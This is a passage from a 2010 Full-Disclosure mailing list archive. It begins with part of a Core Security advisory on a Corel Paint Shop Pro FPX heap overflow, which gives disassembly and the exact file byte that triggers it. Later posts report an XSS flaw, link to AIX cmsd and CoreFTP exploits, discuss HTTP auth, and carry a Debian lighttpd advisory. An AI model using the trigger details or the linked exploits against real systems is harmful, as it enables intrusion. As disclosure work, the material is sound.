ESP,10 09264E07 |. 4F ||DEC EDI ; is the loop counter == 0? 09264E08 |.^ 75 E1 |\JNZ SHORT JPEGACC.09264DEB ; if not, repeat the copy operation 09264E0A |. 8B4424 10 |MOV EAX,DWORD PTR SS:[ESP+10] 09264E0E |> D1E6 |SHL ESI,1 09264E10 |. 43 |INC EBX 09264E11 |. 83FB 08 |CMP EBX,8 09264E14 |.^ 7E BC \JLE SHORT JPEGACC.09264DD2 - -----/ Each iteration of the inner loop will copy 0x80 objects to the buffer, each one with a size of 8 bytes. That means that the buffer, with a size of 0xC08 bytes, will be able to handle a maximum of three iterations; so, an attacker can trigger the buffer overflow by enticing an unsuspecting user to open a specially crafted FPX file with a value greater than 3 in the byte at offset 0x1406. When the bug is triggered, the attacker will be able to write controlled bytes at certain positions after the end of the buffer. After exiting the outer loop, the application enters another loop, where it will write several dwords with a value of 0 into the buffer. The application iterates here as many times as objects were copied to the buffer; that is, a multiple of 0x80. /----- [Module: JPEGACC.dll] 09264E26 |. 8BD6 MOV EDX,ESI ; EDX = number of objects copied to the buffer 09264E28 |> C701 00000000 /MOV DWORD PTR DS:[ECX],0 09264E2E |. 83C1 08 |ADD ECX,8 09264E31 |. 4A |DEC EDX 09264E32 |.^ 75 F4 \JNZ SHORT JPEGACC.09264E28 - -----/ If the FPX file being processed has triggered the buffer overflow as described in the previous step, this loop will be writing beyond the limits of the buffer too, thus corrupting memory contents beyond the end of it, including adjacent chunks metadata. That will ultimately cause a memory access violation when the application tries to free the allocated buffer by calling 'ntdll.RtlFreeHeap': /----- [Module: ntdll.dll] 7C9108D3 8902 MOV DWORD PTR DS:[EDX],EAX Access violation when writing to [00000000] - -----/ 8. *Report Timeline* . 2009-12-02: Being unable to find a security contact on Corel website, Core Security Technologies requests CERT/CC for assistance in contacting Corel to report a security vulnerability. . 2009-12-02: CERT/CC informs Core that it will attempt to contact Corel. . 2009-12-22: Core sends a message to Corel Customer Services (through their website [3]) requesting a security contact, and announcing its intention to publish advisory CORE-2009-1126 on February 1st, 2010. . 2009-12-23: Corel Customer Support Services sends a generic reply without providing a security contact. . 2010-01-12: Core Security Technologies requests again a security contact to Corel Customer Services (through their website), and reminds Corel its intention to publish the advisory CORE-2009-1126 on February 1st, 2010. . 2010-01-15: Corel Customer Support team acknowledges notification, and requests the technical information about the security vulnerability, that will be forwarded to the PaintShop Pro team. . 2010-01-16: Core Security Technologies sends the advisory draft, containing a technical description of the vulnerability (no reply received). . 2010-01-27: Core Security Technologies reminds Corel that its advisory is scheduled for publication on February 1st, 2010, and that the advisory will be published as "user release" if Corel doesn't reply with a plan for fixing the vulnerability. . 2010-02-01: Given the lack of response from Corel, the advisory CORE-2009-1126 is published as "user release". 9. *References* [1] The author participated in Core Security's Bugweek 2009 as member of the team "Estupido y Sensual Flanders". [2] Corel Paint Shop Pro Photo X2 http://www.corel.com/servlet/Satellite/us/en/Product/1184951547051 [3] Corel Customer Services http://corel.custhelp.com 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAktnPikACgkQyNibggitWa2BxgCfYtSY/FIhVjOtPxriGUpmReS/ tdoAnA0zeotWIo3c7UkokdVq2UIi+4yk =Onam -----END PGP SIGNATURE----- From jeffwillis30 at gmail.com Mon Feb 1 21:50:04 2010 From: jeffwillis30 at gmail.com (Jeff Williams) Date: Tue, 2 Feb 2010 08:50:04 +1100 Subject: [Full-disclosure] Persistant XSS Vulnerability in rediff In-Reply-To: References: Message-ID: <64fcd9051002011350p4423111bgd0c1db0a2e58e895@mail.gmail.com> Hey Mustlive, if you still alive you should talk about this on your blog :) 2010/2/2 rockey killer > *About Redif*f > > Rediff.com (Nasdaq: REDF) is one of the premier worldwide online providers > of news, information, communication, entertainment and shopping services. > > Rediff.com provides a platform for Indians worldwide to connect with one > another online. Rediff.com is committed to offering a personalized and a > secure surfing and shopping environment. > > Rediff.com additionally offers the Indian American community one of the > oldest and largest Indian weekly newspapers, India Abroad. > > Founded in 1996, Rediff.com is headquartered in Mumbai, India with offices > in New Delhi, Bangalore, Chennai, Hyderabad and New York, USA. > > Mission In The Internet Space > > To provide world-class online consumer service offerings to Indians > worldwide. > > * > * > > *Vulnerability* > > Persistant XSS Vulnerability in Subject field of rediff > > Vulnerability Reported on : Sat, Jan 23, 2010 at 1:23 AM > > But they din't even cared to respond back . > > * > * > > *Credits* > > This Vulnerability was discovered and reported by w4rl0ck.d0wn and Rockey > Killer of h4ck3r crew > > * > * > > *POC* > > http://h4ck3r.in/Reported%20Vulnerabilities/rediff/ > > > Rockey Killer > h4ck3r Crew > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100202/c50f4d5c/attachment.html From ivanhec at gmail.com Mon Feb 1 23:36:08 2010 From: ivanhec at gmail.com (Ivan .) Date: Tue, 2 Feb 2010 10:36:08 +1100 Subject: [Full-disclosure] Internet attack defense: License and registration please... In-Reply-To: <6450e99d1002011519ya7dcc9ay316c59351842d31a@mail.gmail.com> References: <6450e99d1002011519ya7dcc9ay316c59351842d31a@mail.gmail.com> Message-ID: <6450e99d1002011536w62954809l18471241740e811c@mail.gmail.com> Your documents please? http://government.zdnet.com/?p=6934 From rodrigo at kernelhacking.com Tue Feb 2 08:51:59 2010 From: rodrigo at kernelhacking.com (Rodrigo Rubira Branco (BSDaemon)) Date: Tue, 02 Feb 2010 06:51:59 -0200 Subject: [Full-disclosure] Remote Vulnerability in AIX RPC.cmsd released by iDefense Message-ID: <4B67E7AF.9060902@kernelhacking.com> Hey guys, Just now I saw that iDefense did not include in their advisory the triggering code for this (http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825). I believe it's very important to test your systems and verify the released patch. So here we go: http://www.kernelhacking.com/rodrigo/exploits/cmsd_exploit.c Regards, Rodrigo (BSDaemon). -- Rodrigo Rubira Branco (BSDaemon) "Kernel Hacking: If you really know, you can hack!" From DaveHowe.Pentest at googlemail.com Mon Feb 1 13:57:18 2010 From: DaveHowe.Pentest at googlemail.com (David Howe) Date: Mon, 01 Feb 2010 13:57:18 +0000 Subject: [Full-disclosure] =?utf-8?q?Can_I_manipulate_packet=E2=80=99s_spe?= =?utf-8?q?cific_field_using_Squid=3F?= In-Reply-To: References: <6fa579501001280451x7ff514a2sba7317c56088c110@mail.gmail.com> Message-ID: <4B66DDBE.3070805@googlemail.com> ??? wrote: > Exactly, datapayload. > > I wanna change packet about HTTP(port 80 or port 8080) URL using squid. > Or RTSP packet's URL can do, yes. take a look here for an example of an (amusing) use for this: http://www.ex-parrot.com/pete/upside-down-ternet.html From chris at metatrontech.com Mon Feb 1 20:19:30 2010 From: chris at metatrontech.com (Chris Travers) Date: Mon, 1 Feb 2010 12:19:30 -0800 Subject: [Full-disclosure] [Webappsec] Paper: Weaning the Web off of Session Cookies In-Reply-To: <20100130160744.GE1331@sentinelchicken.org> References: <20100126190509.GI13995@sentinelchicken.org> <20100130160744.GE1331@sentinelchicken.org> Message-ID: <5ed37b141002011219g25f99d24o67f09b2b2a4322bd@mail.gmail.com> Hi all; Just backing up Tim here a bit. In LedgerSMB 1.3, we decided to go to HTTP auth because of some changes in the security architecture of the software. After looking at alternatives, we concluded that http auth was likely to be the way to go long-run. There are some constraints which preclude the use of Digest authentication (negotiated and basic work OK, but the latter really requires SSL). In general the issues came down to: 1) We do pass-through authentication, and both authentication and permissions enforcement occurs on the database-level. 2) To do this effectively, we would have to either store the database passwords somewhere accessible to the web server (opening up possible attacks) or we would have to pass it back using some sort of secure, but reversible encryption scheme. Since the key would have to be accessible on the server, this didn't seem as secure to us as just requiring a usable auth token to be passed to the web server via http auth. There are substantial hurdles to overcome to make this work. However, moving to an HTTP auth framework means that a number of really powerful tools are gained. While it isn't standard yet, I hope the industry moves in that direction. I do think we need some sort of HTTP status or other header information that would tell a browser to clear the auth cache and not try again. Best Wishes, Chris Travers From seeleymagic at hotmail.com Tue Feb 2 10:28:48 2010 From: seeleymagic at hotmail.com (Steven Seeley) Date: Tue, 2 Feb 2010 21:28:48 +1100 Subject: [Full-disclosure] CoreFTP Stack Buffer Overflow Message-ID: http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-007-coreftp-password-field-stack-buffer-overflow/ enjoy, mr_me _________________________________________________________________ Search for properties that match your lifestyle! Start searching NOW! http://clk.atdmt.com/NMN/go/157631292/direct/01/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100202/1e8ce267/attachment.html -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: CORELAN-10-007.txt Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100202/1e8ce267/attachment.txt From nion at debian.org Tue Feb 2 11:19:34 2010 From: nion at debian.org (Nico Golde) Date: Tue, 2 Feb 2010 12:19:34 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1987-1] New lighttpd packages fix denial of service Message-ID: <20100202111934.GA16188@ngolde.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA-1987-1 security at debian.org http://www.debian.org/security/ Nico Golde February 2nd, 2010 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : lighttpd Vulnerability : denial of service Problem type : remote Debian-specific: no Debian bug : none CVE ID : CVE-2010-0295 Li Ming discovered that lighttpd, a small and fast webserver with minimal memory footprint, is vulnerable to a denial of service attack due to bad memory handling. Slowly sending very small chunks of request data causes lighttpd to allocate new buffers for each read instead of appending to old ones. An attacker can abuse this behaviour to cause denial of service conditions due to memory exhaustion. For the oldstable distribution (etch), this problem has been fixed in version 1.4.13-4etch12. For the stable distribution (lenny), this problem has been fixed in version 1.4.19-5+lenny1. For the testing (squeeze) and unstable (sid) distribution, this problem will be fixed soon. We recommend that you upgrade your lighttpd packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian (oldstable) - ------------------ Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch12.dsc Size/MD5 checksum: 1108 a2be7a82e20970071251e5ca71fc660c http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13.orig.tar.gz Size/MD5 checksum: 793309 3a64323b8482b0e8a6246dbfdb4c39dc http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch12.diff.gz Size/MD5 checksum: 39820 9f05aa3a52053d707be87c0f35912ec3 Architecture independent packages: http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-doc_1.4.13-4etch12_all.deb Size/MD5 checksum: 101098 6c7d7bfa494d88c38e9d53d44afcf49e alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch12_alpha.deb Size/MD5 checksum: 60370 f24388eda6bc606c663ef909d1484ba9 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch12_alpha.deb Size/MD5 checksum: 320406 3fd29fadf48816d99fe9baf030bb9a1e http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch12_alpha.deb Size/MD5 checksum: 65202 0d22456f747d42de3c957350ffda2025 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch12_alpha.deb Size/MD5 checksum: 72124 c913f4124bc228ca345264763f19c164 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch12_alpha.deb Size/MD5 checksum: 62148 50582d9263916db3e5c3add5b0c82f40 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch12_alpha.deb Size/MD5 checksum: 65638 bc8798836eb898e969fa1c74ced2263d amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch12_amd64.deb Size/MD5 checksum: 61636 918877b620983d832971d5d3845f3c86 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch12_amd64.deb Size/MD5 checksum: 59926 d72fad101197b9177348b3fdfe59020d http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch12_amd64.deb Size/MD5 checksum: 64500 086df21a5fda61077c12b320407ccb26 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch12_amd64.deb Size/MD5 checksum: 71032 bf00a3cd05e54d5aaa2cd91a9f79a5ac http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch12_amd64.deb Size/MD5 checksum: 64836 f604cc138b5a8de2b52f468efb3f0031 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch12_amd64.deb Size/MD5 checksum: 299794 08a9b33d69d1c7bb56d4b69a24205026 arm architecture (ARM) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch12_arm.deb Size/MD5 checksum: 61288 46a866402e943311aaeb5cbfb0eba5e3 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch12_arm.deb Size/MD5 checksum: 287600 eef09d18e1d37b7422adf10f06c97406 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch12_arm.deb Size/MD5 checksum: 59154 66b50d93049f016e5e6447b8ef813902 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch12_arm.deb Size/MD5 checksum: 63548 e90e7a91f702f3d65be26eeed1ac1987 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch12_arm.deb Size/MD5 checksum: 63340 dfd3a3db7d5e74c5abe7d64f3ec0d7f6 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch12_arm.deb Size/MD5 checksum: 70208 f8818b2dca75f3204d6d63946631904e hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch12_hppa.deb Size/MD5 checksum: 59804 67c275ae5602378c9c4690c53bda26b0 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch12_hppa.deb Size/MD5 checksum: 65376 4a4b7c631ad2ac9d112ecf58dba33edf http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch12_hppa.deb Size/MD5 checksum: 323098 1dec43cd0b18233203411686abcd1575 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch12_hppa.deb Size/MD5 checksum: 64868 8aaaf46ad4b092dba1ed2729db0facd2 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch12_hppa.deb Size/MD5 checksum: 72780 358ff940ee5da1aa7f1a20006a69c5ac http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch12_hppa.deb Size/MD5 checksum: 61806 b3510b57940378f1a7ef8f4841866cb9 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch12_i386.deb Size/MD5 checksum: 64392 b8f33f0e3411cf5451a0cea231409746 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch12_i386.deb Size/MD5 checksum: 64184 c005107155f2ae5cd6167d1f1d793d36 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch12_i386.deb Size/MD5 checksum: 61358 f29271c62a2aab415abf4780389ecb41 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch12_i386.deb Size/MD5 checksum: 59596 206fb9cfe9234db85ee0d417c3436ab4 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch12_i386.deb Size/MD5 checksum: 71496 6e6bef7d6a8665bd78763d37fed416ac http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch12_i386.deb Size/MD5 checksum: 290004 7a710389c6efef8a00b03ea2e960f17f ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch12_ia64.deb Size/MD5 checksum: 77590 6b5a71e75c89a8326b6072b6bb022d68 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch12_ia64.deb Size/MD5 checksum: 61692 617c3df2fd221fb5cecff9727120c307 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch12_ia64.deb Size/MD5 checksum: 63572 acd66904a46dda5035bcb2663c300c63 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch12_ia64.deb Size/MD5 checksum: 67886 444ecf614179b52ae21943765e10e605 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch12_ia64.deb Size/MD5 checksum: 68026 e1f719f2627bf0e4accf7b62c583096e http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch12_ia64.deb Size/MD5 checksum: 404182 499f06d73dd67f6261bac97c993badac mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch12_mipsel.deb Size/MD5 checksum: 70550 dd5ffa7e015a857a820a7d1292c198a0 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch12_mipsel.deb Size/MD5 checksum: 61260 28b00ec06cbb66c20a68fadf979e203c http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch12_mipsel.deb Size/MD5 checksum: 298420 0dd0ef6dff4f621fc5ba2fa57866a59d http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch12_mipsel.deb Size/MD5 checksum: 59782 105197b36c2c6e99996be53030ef5df4 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch12_mipsel.deb Size/MD5 checksum: 64054 1c9287f4489e57f625a8f65c1f5eab20 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch12_mipsel.deb Size/MD5 checksum: 63886 d0c610558df8be7632606549115ba047 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch12_powerpc.deb Size/MD5 checksum: 65878 163285bde244d4b9301870c3ed3bc109 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch12_powerpc.deb Size/MD5 checksum: 63184 87516847b6e0a123fa6f6253688df4c1 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch12_powerpc.deb Size/MD5 checksum: 66156 21324ae7baf21a46121c357641e9f36a http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch12_powerpc.deb Size/MD5 checksum: 72542 823d715bcb56b54d5504fce88e7edeec http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch12_powerpc.deb Size/MD5 checksum: 61400 eaedc7afd640991e4a254d5075d68fae http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch12_powerpc.deb Size/MD5 checksum: 323732 7b170668d041f2019786bae992e623cd s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch12_s390.deb Size/MD5 checksum: 60200 a55b75f7dde8697326bb917d6adeabc8 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch12_s390.deb Size/MD5 checksum: 72204 dd41f5030ff57ceaa582810ba24fc0ee http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch12_s390.deb Size/MD5 checksum: 64866 472d22247b86c5861cd793712c182d9c http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch12_s390.deb Size/MD5 checksum: 61740 5341aca4a88d614fa662cf153bcb897a http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch12_s390.deb Size/MD5 checksum: 65256 9c2a42a08dc7bdbc9bacabf74329269d http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch12_s390.deb Size/MD5 checksum: 307074 8f839f8e7f9228e949f2b50160bf1906 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch12_sparc.deb Size/MD5 checksum: 70740 5ca564854c876d78662515db459c64e2 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch12_sparc.deb Size/MD5 checksum: 64144 dfd8a2dbce6377c1d180f434d715e97c http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch12_sparc.deb Size/MD5 checksum: 285020 13bf19296e5a3761392c3d82c9934fed http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch12_sparc.deb Size/MD5 checksum: 64164 0a803bc9cd6ef27e59e71806d599f6de http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch12_sparc.deb Size/MD5 checksum: 61238 76e2c32c82542369902ccb2ccaaa8c0e http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch12_sparc.deb Size/MD5 checksum: 59620 cd273a623a05d5223c35904b391a6340 Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.19-5+lenny1.dsc Size/MD5 checksum: 1707 9db0f343d28732f798c1a2020423ddd9 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.19-5+lenny1.diff.gz Size/MD5 checksum: 27536 640ccb5678115f069777077fb0b5cffd http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.19.orig.tar.gz Size/MD5 checksum: 815568 cede410e7adee3ea14206749190a8b5d Architecture independent packages: http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-doc_1.4.19-5+lenny1_all.deb Size/MD5 checksum: 109512 1b9696c70c89f82d9a17a086a7de8d31 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.19-5+lenny1_alpha.deb Size/MD5 checksum: 72534 e6f145f65cba4aac88d51809311e8082 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.19-5+lenny1_alpha.deb Size/MD5 checksum: 340626 f73cdd6194b566550439da1b03777796 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.19-5+lenny1_alpha.deb Size/MD5 checksum: 79430 432a06b4fdcb19b209389de1fe4a7bc4 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.19-5+lenny1_alpha.deb Size/MD5 checksum: 67284 241ba44dcb5e197c3f63a43355a85517 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.19-5+lenny1_alpha.deb Size/MD5 checksum: 72008 9a18bb66b361d067457cf7fb1d10fb9c http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.19-5+lenny1_alpha.deb Size/MD5 checksum: 68920 c801216dc8ac72e633e005d70face5f9 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.19-5+lenny1_amd64.deb Size/MD5 checksum: 71888 540242cb493bf32ad190ccd3853e3a1c http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.19-5+lenny1_amd64.deb Size/MD5 checksum: 78760 fcf4e53e61ef01d9fe39a8a5a19bfea3 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.19-5+lenny1_amd64.deb Size/MD5 checksum: 71592 059444d28cec9b2b7542dfe56e199074 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.19-5+lenny1_amd64.deb Size/MD5 checksum: 322470 f89f9e381d6e6e1b5b61306527068639 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.19-5+lenny1_amd64.deb Size/MD5 checksum: 66902 c47b25719738fb7726970b9533e140b1 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.19-5+lenny1_amd64.deb Size/MD5 checksum: 68462 3c1b0a403b9610c32bd9d2297b5b2670 arm architecture (ARM) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.19-5+lenny1_arm.deb Size/MD5 checksum: 70572 513a8641dd407769b09ac2ac0f0c5512 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.19-5+lenny1_arm.deb Size/MD5 checksum: 66136 7017f5567130b60ee476d0e33558c07d http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.19-5+lenny1_arm.deb Size/MD5 checksum: 310818 af9e22c6cdddf8f1fd058cf2915e408b http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.19-5+lenny1_arm.deb Size/MD5 checksum: 77690 b1a37635507cf95f04d76f6c9f3f6295 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.19-5+lenny1_arm.deb Size/MD5 checksum: 70394 e71afeb997f13ae72461a816cde281c3 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.19-5+lenny1_arm.deb Size/MD5 checksum: 68072 9a45c9cc91850162336bf876475c8ec5 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.19-5+lenny1_armel.deb Size/MD5 checksum: 77410 8ad7981f12a57d92182767858069dd66 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.19-5+lenny1_armel.deb Size/MD5 checksum: 68038 925065ed03b1596aba5947df1ee62bb9 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.19-5+lenny1_armel.deb Size/MD5 checksum: 72240 479c7edd0aa58496f691097ce9052c3d http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.19-5+lenny1_armel.deb Size/MD5 checksum: 315334 c256c4321239bf575d5ebad186423425 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.19-5+lenny1_armel.deb Size/MD5 checksum: 66434 6779fd674434a719f2969e9cd40088ac http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.19-5+lenny1_armel.deb Size/MD5 checksum: 71628 4339f2c1f7a3d703207295e947d3744e hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.19-5+lenny1_hppa.deb Size/MD5 checksum: 69190 0676bd9e82c84fd9fca37c1b5026d141 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.19-5+lenny1_hppa.deb Size/MD5 checksum: 67216 f28d9b951c97edc101225b045f1c6d66 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.19-5+lenny1_hppa.deb Size/MD5 checksum: 80894 2d0b5d5f9a0d8941d2ce3d6c1402b049 